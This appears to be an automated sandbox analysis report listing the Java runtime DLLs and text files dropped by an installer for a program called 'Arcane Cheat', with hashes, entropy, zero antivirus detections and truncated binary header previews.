                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./zR/k.<|k.<|k.<|p..|{.<|p..|2.<|bc.|n.<|k.=|7.<|p..|O.<|p..|j.<|p..|j.<|p..|j.<|Richk.<|........................PE..L...qPjW...........!................!o.............p......................................@.........................p7..>...<0..<.......x............^..@...........................................(+..@...............@............................text...<........................... ..`.rdata...e.......f..................@..@.data...`,...P.......0..............@....rsrc...x............>..............@..@.reloc..J............F..............@..B........................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\awt.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):1182272
                                Entropy (8bit):6.63089480914076
                                Encrypted:false
                                SSDEEP:24576:68M4H6ioDs5FELnSbY6Ck2IlAnVCXQlFg3:9eaGnkXQlFQ
                                MD5:159CCF1200C422CED5407FED35F7E37D
                                SHA1:177A216B71C9902E254C0A9908FCB46E8D5801A9
                                SHA-256:30EB581C99C8BCBC54012AA5E6084B6EF4FCEE5D9968E9CC51F5734449E1FF49
                                SHA-512:AB3F4E3851313391B5B8055E4D526963C38C4403FA74FB70750CC6A2D5108E63A0E600978FA14A7201C48E1AFD718A1C6823D091C90D77B17562B7A4C8C40365
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                • Antivirus: Virustotal, Detection: 0%, Browse
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Q.Q...?...?...?......?.......?.......?.z...?.......?.......?...>.;.?.....s.?.....w.?.......?.......?.......?.Rich..?.........................PE..L...nPjW...........!................,G.............m.........................P......Y.....@.................................,{...........N..............@....P......................................v..@............... ....V..`....................text...<........................... ..`.rdata.............................@..@.data...8....@...~...2..............@....rsrc....N.......P..................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\bci.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):15424
                                Entropy (8bit):6.380726588633652
                                Encrypted:false
                                SSDEEP:384:1Td3hw/L3kKLnYgIOGOOssnPV5Lnf6onYPLr7EbH:1zw/bkKLt7KnddnfPC7S
                                MD5:A46289384F76C2A41BA7251459849288
                                SHA1:4D8EF96EDBE07C8722FA24E4A5B96EBFA18BE2C4
                                SHA-256:728D64BC1FBF48D4968B1B93893F1B5DB88B052AB82202C6840BF7886A64017D
                                SHA-512:34D62BEB1FA7D8630F5562C1E48839CE9429FAEA980561E58076DF5F19755761454EEB882790EC1035C64C654FC1A8CD5EB46ECA12E2BC81449ACBB73296C9E8
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                • Antivirus: Virustotal, Detection: 0%, Browse
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6...W..W..W../x.W...w.W..W..W....s.W...u.W...@.W...A.W...p.W...q.W...v.W..Rich.W..........................PE..L...nPjW...........!......................... .....m.........................`.......9....@..........................'......|$..<....@...............$..@....P....... ..............................8#..@............ ...............................text............................... ..`.rdata..v.... ......................@..@.data...p....0......................@....rsrc........@......................@..@.reloc.......P......."..............@..B........................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\client\Xusage.txt (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1447
                                Entropy (8bit):4.228834598358894
                                Encrypted:false
                                SSDEEP:24:+3AKdmzfuv6pBSyGJkR/4o6kn2SRGehD+GrspGC/hLRra:BzMUBLGJkBA+RGeV+GrspGC/TO
                                MD5:F4188DEB5103B6D7015B2106938BFA23
                                SHA1:8E3781A080CD72FDE8702EB6E02A05A23B4160F8
                                SHA-256:BD54E6150AD98B444D5D24CEA9DDAFE347ED11A1AAE749F8E4D59C963E67E763
                                SHA-512:0BE9A00A48CF8C7D210126591E61531899502E694A3C3BA7C3235295E80B1733B6F399CAE58FB4F7BFF2C934DA7782D256BDF46793F814A5F25B7A811D0CB2E3
                                Malicious:false
                                Preview: -Xmixed mixed mode execution (default).. -Xint interpreted mode execution only.. -Xbootclasspath:<directories and zip/jar files separated by ;>.. set search path for bootstrap classes and resources.. -Xbootclasspath/a:<directories and zip/jar files separated by ;>.. append to end of bootstrap class path.. -Xbootclasspath/p:<directories and zip/jar files separated by ;>.. prepend in front of bootstrap class path.. -Xnoclassgc disable class garbage collection.. -Xincgc enable incremental garbage collection.. -Xloggc:<file> log GC status to a file with time stamps.. -Xbatch disable background compilation.. -Xms<size> set initial Java heap size.. -Xmx<size> set maximum Java heap size.. -Xss<size> set java thread stack size.. -Xprof output cpu profiling data.. -Xfuture enable strictest checks, an

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\client\is-95M9J.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1447
                                Entropy (8bit):4.228834598358894
                                Encrypted:false
                                SSDEEP:24:+3AKdmzfuv6pBSyGJkR/4o6kn2SRGehD+GrspGC/hLRra:BzMUBLGJkBA+RGeV+GrspGC/TO
                                MD5:F4188DEB5103B6D7015B2106938BFA23
                                SHA1:8E3781A080CD72FDE8702EB6E02A05A23B4160F8
                                SHA-256:BD54E6150AD98B444D5D24CEA9DDAFE347ED11A1AAE749F8E4D59C963E67E763
                                SHA-512:0BE9A00A48CF8C7D210126591E61531899502E694A3C3BA7C3235295E80B1733B6F399CAE58FB4F7BFF2C934DA7782D256BDF46793F814A5F25B7A811D0CB2E3
                                Malicious:false
                                Preview: -Xmixed mixed mode execution (default).. -Xint interpreted mode execution only.. -Xbootclasspath:<directories and zip/jar files separated by ;>.. set search path for bootstrap classes and resources.. -Xbootclasspath/a:<directories and zip/jar files separated by ;>.. append to end of bootstrap class path.. -Xbootclasspath/p:<directories and zip/jar files separated by ;>.. prepend in front of bootstrap class path.. -Xnoclassgc disable class garbage collection.. -Xincgc enable incremental garbage collection.. -Xloggc:<file> log GC status to a file with time stamps.. -Xbatch disable background compilation.. -Xms<size> set initial Java heap size.. -Xmx<size> set maximum Java heap size.. -Xss<size> set java thread stack size.. -Xprof output cpu profiling data.. -Xfuture enable strictest checks, an

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\client\is-KHA4M.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):3857984
                                Entropy (8bit):6.850425436805504
                                Encrypted:false
                                SSDEEP:98304:GyXul1SNceWfkD000V3wnIACM7g6cv/GZ:Q1SgfEP0ZwnIA97dcv/GZ
                                MD5:39C302FE0781E5AF6D007E55F509606A
                                SHA1:23690A52E8C6578DE6A7980BB78AAE69D0F31780
                                SHA-256:B1FBDBB1E4C692B34D3B9F28F8188FC6105B05D311C266D59AA5E5EC531966BC
                                SHA-512:67F91A75E16C02CA245233B820DF985BD8290A2A50480DFF4B2FD2695E3CF0B4534EB1BF0D357D0B14F15CE8BD13C82D2748B5EDD9CC38DC9E713F5DC383ED77
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                • Antivirus: Virustotal, Detection: 0%, Browse
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$=.$`\.w`\.w`\.w{.Twb\.w..Pwf\.w{.Vwl\.w{.bwl\.wi$[wo\.w`\.w}].w{.cw-^.w{.Swa\.w{.Rwa\.w{.Uwa\.wRich`\.w........PE..L...nPjW...........!......,...........+.......,....m..........................<......q;...@...........................4.......4.......9.(.............:.@.... 9..G....,..............................t2.@.............,.P............................text.....+.......,................. ..`.rdata..Y.....,.......,.............@..@.data...d.....5..*....4.............@....rsrc...(.....9......"7.............@..@.reloc..\.... 9......(7.............@..B........................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\client\jvm.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):3857984
                                Entropy (8bit):6.850425436805504
                                Encrypted:false
                                SSDEEP:98304:GyXul1SNceWfkD000V3wnIACM7g6cv/GZ:Q1SgfEP0ZwnIA97dcv/GZ
                                MD5:39C302FE0781E5AF6D007E55F509606A
                                SHA1:23690A52E8C6578DE6A7980BB78AAE69D0F31780
                                SHA-256:B1FBDBB1E4C692B34D3B9F28F8188FC6105B05D311C266D59AA5E5EC531966BC
                                SHA-512:67F91A75E16C02CA245233B820DF985BD8290A2A50480DFF4B2FD2695E3CF0B4534EB1BF0D357D0B14F15CE8BD13C82D2748B5EDD9CC38DC9E713F5DC383ED77
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                • Antivirus: Virustotal, Detection: 0%, Browse
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$=.$`\.w`\.w`\.w{.Twb\.w..Pwf\.w{.Vwl\.w{.bwl\.wi$[wo\.w`\.w}].w{.cw-^.w{.Swa\.w{.Rwa\.w{.Uwa\.wRich`\.w........PE..L...nPjW...........!......,...........+.......,....m..........................<......q;...@...........................4.......4.......9.(.............:.@.... 9..G....,..............................t2.@.............,.P............................text.....+.......,................. ..`.rdata..Y.....,.......,.............@..@.data...d.....5..*....4.............@....rsrc...(.....9......"7.............@..@.reloc..\.... 9......(7.............@..B........................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\dcpr.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):142912
                                Entropy (8bit):7.350682736920136
                                Encrypted:false
                                SSDEEP:3072:aoGzTjLkRPQ9U9NuLqcNicj5ojGylYCE2Iu2jGLF5A9bE8LUekfCz:LGz/oRPGLJN1IGgYCE2L1F5A9bEGUeR
                                MD5:4BDC32EF5DA731393ACC1B8C052F1989
                                SHA1:A677C04ECD13F074DE68CC41F13948D3B86B6C19
                                SHA-256:A3B35CC8C2E6D22B5832AF74AAF4D1BB35069EDD73073DFFEC2595230CA81772
                                SHA-512:E71EA78D45E6C6BD08B2C5CD31F003F911FD4C82316363D26945D17977C2939F65E3B9748447006F95C3C6653CE30D2CDA67322D246D43C9EB892A8E83DEB31A
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                • Antivirus: Virustotal, Detection: 0%, Browse
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k..K.c.K.c.K.c.Br..I.c.P...H.c.P...I.c.P...N.c.K.b.m.c.P...m.c.P...J.c.P...J.c.P...J.c.RichK.c.........................PE..L...nPjW...........!.........Z......V.............Sm.........................@.......!....@.................................<...P.... ..................@....0..........................................@............................................text...n........................... ..`.rdata........... ..................@..@.data....+.......(..................@....rsrc........ ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\decora_sse.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):64064
                                Entropy (8bit):6.338192715882019
                                Encrypted:false
                                SSDEEP:1536:Skh2CQuUlng7qkKi5iO8pm8cN9qOU33oit:Skkhu0nTli5jN8cNAOUHnt
                                MD5:B04ABE76C4147DE1D726962F86473CF2
                                SHA1:3104BADA746678B0A88E5E4A77904D78A71D1AB8
                                SHA-256:07FF22E96DCFD89226E5B85CC07C34318DD32CDA23B7EA0474E09338654BFEB3
                                SHA-512:2E4E2FEB63B6D7388770D8132A880422ABF6A01941BFF12CAD74DB4A641BDA2DCC8BF58F6DAE90E41CC250B79E7956DDF126943E0F6200272F3376A9A19505F1
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                • Antivirus: Virustotal, Detection: 0%, Browse
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?...{.|.{.|.{.|..N..y.|.{.}.g.|.v.x.|.v.y.|.v.w.|.v.y.|....Z.|....z.|.v.z.|....z.|.Rich{.|.........................PE..L...nPjW...........!......... ......_.............Vm......................... .......*....@.....................................<.......................@...........................................(...@...............t............................text............................... ..`.rdata..............................@..@.data...\...........................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\deploy.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):453184
                                Entropy (8bit):6.516599034237354
                                Encrypted:false
                                SSDEEP:6144:3J/sbugq7rm5zX2JDYfiA9+wvpsEWcIGnFm8iTFOBITfnvxIW1x8:3JUbzq+5zX25qvdfnFm88nvq+x8
                                MD5:5EDAEFFC60B5F1147068E4A296F6D7FB
                                SHA1:7D36698C62386449A5FA2607886F4ADF7FB3DEEF
                                SHA-256:87847204933551F69F1CBA7A73B63A252D12EF106C22ED9C561EF188DFFCBAE8
                                SHA-512:A691EF121D3AC17569E27BB6DE4688D3506895B1A1A8740E1F16E80EEFCE70BA18B9C1EFD6FD6794FAFC59BA2CAF137B4007FCDC65DDB8BCBFCF42C97B13535B
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                • Antivirus: Virustotal, Detection: 0%, Browse
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........T...:...:...:.......:.e....:......:......:.....:....:....:...;.`.:......:.......:.......:.......:.Rich..:.................PE..L...oPjW...........!.........:......n.............Xm................................-.....@.........................@...\6..............................@.......|8..................................Xh..@...............X...8........................text............................... ..`.rdata...;.......<..................@..@.data...............................@....rsrc...............................@..@.reloc..ZE.......F..................@..B................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\dt_shmem.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):25152
                                Entropy (8bit):6.627329311560644
                                Encrypted:false
                                SSDEEP:384:0mgNWEfK0RiC4qxJL8VI6ZEPG5Vv/11nYPLr7N:H6WmK0RiSxJ4VI6W+zbC7N
                                MD5:72B7054811A72D9D48C95845F93FCD2C
                                SHA1:D25F68566E11B91C2A0989BCC64C6EF17395D775
                                SHA-256:D4B63243D1787809020BA6E91564D17FFEA4762AF99201E241F4ECD20108D2E8
                                SHA-512:C6A16DAAF856939615DFDE8E9DBE9D5BFC415507011E85E44C6BF88B17B705C35CD7CED8EDA8F358745063F41096938D128DEE17E14FE93252E5B046BDFCDDC0
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                • Antivirus: Virustotal, Detection: 0%, Browse
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%..cK.cK.cK....cK....cK.cJ.cK....cK....cK....cK....cK....cK....cK.Rich.cK.........PE..L...nPjW...........!.....*...........4.......@....|m................................:6....@.........................0M.......H..<....p...............J..@............A...............................F..@............@...............................text....).......*.................. ..`.rdata.......@......................@..@.data........`.......@..............@....rsrc........p.......B..............@..@.reloc..z............F..............@..B................................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\dt_socket.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):21568
                                Entropy (8bit):6.601333059222365
                                Encrypted:false
                                SSDEEP:384:QwiAYZIxsQbbRLEs5Ltd7rpPVJfq0nYPLr7Ko+:BiPZj+bVEmtd7rpdJfnC7J+
                                MD5:73603BF0DC85CAA2F4C4A38B9806EC82
                                SHA1:74EBC4F158936842840973F54AF50CDF46BC9096
                                SHA-256:39EF85AB21F653993C8AAAB2A487E8909D6401A21F27CBA09283B46556FB16AF
                                SHA-512:5C238D677D458D5B7D43FA3FF424E13B62ABFCEDE66D55E3112DC09BF2F7B640EB8F82D00E41A2C7A7E7B36E3FCE3C2DCB060037314418D329466CC462D0BF71
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                • Antivirus: Virustotal, Detection: 0%, Browse
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..<...<...<...'<8.>...'<:.>...'<..>...<...v...5.7.9...'<..1...'<?.=...'<>.=...'<9.=...Rich<...........................PE..L...nPjW...........!.................&.......0....}m................................F.....@..........................A..U....<..P....`...............<..@....p......@1..............................x;..@............0..(............................text............................... ..`.rdata.......0....... ..............@..@.data........P.......2..............@....rsrc........`.......4..............@..@.reloc.......p.......8..............@..B................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\dtplugin\deployJava1.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):827456
                                Entropy (8bit):6.022966185458799
                                Encrypted:false
                                SSDEEP:24576:E0NweWDjb28WNjE/lBy/pUbS3lYMpQIRrAOh3:7Wb5By/pUbouAQIRHh3
                                MD5:E741028613B1FC49EC5A899BE6E3FC34
                                SHA1:9EAE3D3CA22E92A925395A660B55CECB2EB62D54
                                SHA-256:9163A546696E581D443B3A6250F61E5368BE984C69ADFB54EE2B0E51D0FA008E
                                SHA-512:05C6CE707F4F0F415E74D32F1AACEC7E2C7746C3D04C75502EAECAFAF9E0108CE6206A8A3939C92EDCE449FFC0A68FB4389EDAA93D61920D1EC85327D1B3A55A
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Vu.'...t...t...t..Tt...t.lIt...t.lYt...t...t...t}bat...t..`t...t..at{..t..Qt...t..Pt...t..Wt...tRich...t................PE..L...pPjW...........!................T.............`m.....................................@.........................................P..................@....p..\^.....................................@...............X...........................text...,........................... ..`.rdata..8...........................@..@.data....t.......R..................@....rsrc........P......................@..@.reloc..zr...p...t..................@..B................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\dtplugin\is-7TEQQ.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):907328
                                Entropy (8bit):6.160830535423145
                                Encrypted:false
                                SSDEEP:24576:ZyWOeRjqm9ZRI+Ga+fme7CV93+x6FQ3ge:VRAeMme7kA6F6ge
                                MD5:4FD3548990CAF9771B688532DEF5DE48
                                SHA1:567C27A4EA16775085D8E87A38FE58BEC4463F7D
                                SHA-256:BDE5DF7BCFC35270B57A8982949BF5F25592A2E560A04E9868B84BEF83A0EA4B
                                SHA-512:FD2CF2072A786293E30CD495BA06F4734F0CEA63CBC49B6D7A24F6891612375E48D1B5758D9408625E769E8A81C7C34F04278E011BCF47EDEB8C2AFC13AEC20C
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............x...x...x....k..x...._..x....v..x....f..x...x...y....^..x....^..x....n..x....o..x....h..x..Rich.x..........................PE..L...nPjW...........!.................D.......0....mm................................t.....@..........................>......."..........................@........c...5..............................p...@............0..4............................text............................... ..`.rdata..T....0......................@..@.data...$Y...@...6...,..............@....rsrc................b..............@..@.reloc...g.......h...X..............@..B........................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\dtplugin\is-L2DJE.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):827456
                                Entropy (8bit):6.022966185458799
                                Encrypted:false
                                SSDEEP:24576:E0NweWDjb28WNjE/lBy/pUbS3lYMpQIRrAOh3:7Wb5By/pUbouAQIRHh3
                                MD5:E741028613B1FC49EC5A899BE6E3FC34
                                SHA1:9EAE3D3CA22E92A925395A660B55CECB2EB62D54
                                SHA-256:9163A546696E581D443B3A6250F61E5368BE984C69ADFB54EE2B0E51D0FA008E
                                SHA-512:05C6CE707F4F0F415E74D32F1AACEC7E2C7746C3D04C75502EAECAFAF9E0108CE6206A8A3939C92EDCE449FFC0A68FB4389EDAA93D61920D1EC85327D1B3A55A
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Vu.'...t...t...t..Tt...t.lIt...t.lYt...t...t...t}bat...t..`t...t..at{..t..Qt...t..Pt...t..Wt...tRich...t................PE..L...pPjW...........!................T.............`m.....................................@.........................................P..................@....p..\^.....................................@...............X...........................text...,........................... ..`.rdata..8...........................@..@.data....t.......R..................@....rsrc........P......................@..@.reloc..zr...p...t..................@..B................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\dtplugin\npdeployJava1.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):907328
                                Entropy (8bit):6.160830535423145
                                Encrypted:false
                                SSDEEP:24576:ZyWOeRjqm9ZRI+Ga+fme7CV93+x6FQ3ge:VRAeMme7kA6F6ge
                                MD5:4FD3548990CAF9771B688532DEF5DE48
                                SHA1:567C27A4EA16775085D8E87A38FE58BEC4463F7D
                                SHA-256:BDE5DF7BCFC35270B57A8982949BF5F25592A2E560A04E9868B84BEF83A0EA4B
                                SHA-512:FD2CF2072A786293E30CD495BA06F4734F0CEA63CBC49B6D7A24F6891612375E48D1B5758D9408625E769E8A81C7C34F04278E011BCF47EDEB8C2AFC13AEC20C
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............x...x...x....k..x...._..x....v..x....f..x...x...y....^..x....^..x....n..x....o..x....h..x..Rich.x..........................PE..L...nPjW...........!.................D.......0....mm................................t.....@..........................>......."..........................@........c...5..............................p...@............0..4............................text............................... ..`.rdata..T....0......................@..@.data...$Y...@...6...,..............@....rsrc................b..............@..@.reloc...g.......h...X..............@..B........................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\eula.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):109120
                                Entropy (8bit):5.986571003903383
                                Encrypted:false
                                SSDEEP:1536:LE9WcstxlDgZ9EYDKg0nc6N3MR+EpOB+o+5PVT/B:ghspgZPDanhs+EpOBF+5PFB
                                MD5:A5455B9BEB5672D89B1F0FCFAA4C79CA
                                SHA1:9C7DBB5AD1CB3EBE7347A9CDDD80389902DA81EC
                                SHA-256:89A429889DCD0F6A3FE56217A0FEB5912132AAB2817643021EAE3716DA533D4A
                                SHA-512:131866A4754F4AF78A94F0776815E7EA4375736A4B11A723B87A4436FA101D271FFE14E4B49D3AB1AE2FA61CDBDED0C3D174C75327BE3C24E0E4CC39AFFA9469
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ot....Z...Z...Z..Z...ZC@.Z...Z..Z...Z..Z...Z.v.Z...Z.v.Z...Z...Z...Z.x.Z...Z..Z...Z..Z...Z..Z...Z..Z...ZRich...Z........................PE..L...oPjW...........!..............................~m......................................@.........................P...J............0...t..............@...........P...............................0...@............... ...d...`....................text............................... ..`.rdata...D.......F..................@..@.data...0...........................@....rsrc....t...0...v..................@..@.reloc...............|..............@..B........................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\fontmanager.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):223296
                                Entropy (8bit):6.501845596055873
                                Encrypted:false
                                SSDEEP:6144:8P8OC0xbNXLJAEh4hijzud6kAgZkFGMReiDfbgOBI1:8P8OC0xbNXLJAEh4hijzud6kAgYGSA
                                MD5:9D5EDECF7E33DDD0E2A6A0D34FC12CA1
                                SHA1:FC228A80FF85D78AA5BFBA2515EFED3257B9B009
                                SHA-256:6D817519C2E2EFDD3986EB655C1F687D4774730AB20768DF1C0AAEF03B110965
                                SHA-512:B4D58D3415D0255DCD87EF413762BC0F2934AAA6C8151344266949D3DD549ABDCA1366FA751A988CDDC1430EBF5D17668ADF02096DD4D5EAFE75604C0DA0B4C9
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......wG.s3&. 3&. 3&. .h. 0&. (.. 6&. :^. ;&. (.. 4&. 3&. n&. (.4 n&. (.5 "&. (.. 2&. (.. 2&. (.. 2&. Rich3&. ........PE..L...oPjW...........!.........~.....................m.................................e....@......................... ;.......1.......`...............P..@....p......................................@...@............................................text............................... ..`.rdata...O.......P..................@..@.data........@.......,..............@....rsrc........`.......8..............@..@.reloc..L....p.......<..............@..B........................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\fxplugins.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):151104
                                Entropy (8bit):6.548096027649263
                                Encrypted:false
                                SSDEEP:3072:PPuiQNBInyjJ2y53/5d8n9e/ry7zOAHpyWWJd1u2TeKSNlGFGZQfVN2:iBInu2y5P5dkeDy7zOUpLJ2mHZQf2
                                MD5:7A710F90A74981C2F060FA361D094822
                                SHA1:FBDCA4E3F19AD5201572974E3C772A3C2694FBB3
                                SHA-256:9BC52058C02E0C87A6A9470C62D1AA4F998942CC00F99A82E7805E87D958BC16
                                SHA-512:928708DFF6A372BA997C072238823469CBFD28CCBB17A723AD35F851D35C6EFF82748AA41A9215955B9536A14AA57D47ABE0F1BA00D11F8D920A57F91B7A35E5
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................5......7.....................&.......8.......#.....5.........................4......3.....6.....Rich....................PE..L...oPjW...........!................g..............m.........................p............@.........................0...P............@...............6..@....P..........................................@...............4............................text............................... ..`.rdata...g.......h..................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\glass.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):200768
                                Entropy (8bit):6.431501859060678
                                Encrypted:false
                                SSDEEP:3072:lC0MaRHVsSduCCkNlKpR1FHNnuNcCwJPT54l2B3Fzkmldrz5ZD9hYJOj9T3iRK:s0XR1sYtxgGl2B3uWjhYJOj9TSY
                                MD5:434CBB561D7F326BBEFFA2271ECC1446
                                SHA1:3D9639F6DA2BC8AC5A536C150474B659D0177207
                                SHA-256:1EDD9022C10C27BBBA2AD843310458EDAEAD37A9767C6FC8FDDAAF1ADFCBC143
                                SHA-512:9E37B985ECF0B2FEF262F183C1CD26D437C8C7BE97AA4EC4CD8C75C044336CC69A56A4614EA6D33DC252FE0DA8E1BBADC193FF61B87BE5DCE6610525F321B6DC
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............g_..g_..g_..._..g_..._..g_..._..g_..._..g_aT._..g_aT._..g_aT._..g_..f_..g_..._..g_.._..g_.._..g_..._..g_.._..g_Rich..g_........................PE..L...oPjW...........!...............................m.........................0............@..........................l..................X&..............@........(......................................@...............<....^.......................text...\........................... ..`.rdata..............................@..@.data...\"..........................@....rsrc...X&.......(..................@..@.reloc...(.......*..................@..B................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\glib-lite.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):400960
